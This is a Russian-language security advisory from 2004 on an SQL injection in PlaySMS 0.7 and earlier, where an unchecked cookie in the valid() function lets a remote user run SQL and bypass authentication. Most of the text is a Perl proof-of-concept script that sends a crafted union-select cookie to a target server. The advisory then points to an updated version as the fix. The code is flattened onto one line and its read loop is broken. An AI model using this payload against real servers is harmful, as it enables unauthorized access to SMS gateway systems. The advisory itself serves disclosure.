Дата публикации: | 21.08.2004 |
Всего просмотров: | 1201 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: PlaySMS 0.7 и более ранние версии
Описание: Уязвимость в PlaySMS позволяет удаленному пользователю выполнить нападение SQL инъекции. Функция valid() не проверят данные пользователя в Куки. Удаленный пользователь может представить специально обработанные Куки, чтобы выполнить произвольные SQL команды. Уязвимость, например, может эксплуатироваться для обхода процесса аутентификации. Пример/Эксплоит: #!/usr/bin/perl # PlaySMS version 0.7 and prior SQL Injection PoC # Written by Noam Rathaus of Beyond Security Ltd. use IO::Socket; use strict; my $host = $ARGV[0]; my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); unless ($remote) { die "cannot connect to http daemon on $host" } print "connected\n"; $remote->autoflush(1); my $http = "GET /~playsms/fr_left.php HTTP/1.1\r Host: $host:80\r User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1\r Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r Accept-Language: en-us,en;q=0.5\r Accept-Encoding: gzip,deflate\r Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r Keep-Alive: 300\r Cookie: vc1=ticket; vc2='%20union%20select%20'ticket; Content-Type: application/x-www-form-urlencoded\r Connection: close\r "; print "HTTP: [$http]\n"; print $remote $http; sleep(1); print "Sent\n"; while () print $_; print "\n"; close $remote; URL производителя: http://playsms.sourceforge.net/web/ Решение:Установите обновленную версию программы: http://playsms.sourceforge.net/web/ |
|
Ссылки: | PlaySMS SQL Injection via Cookie |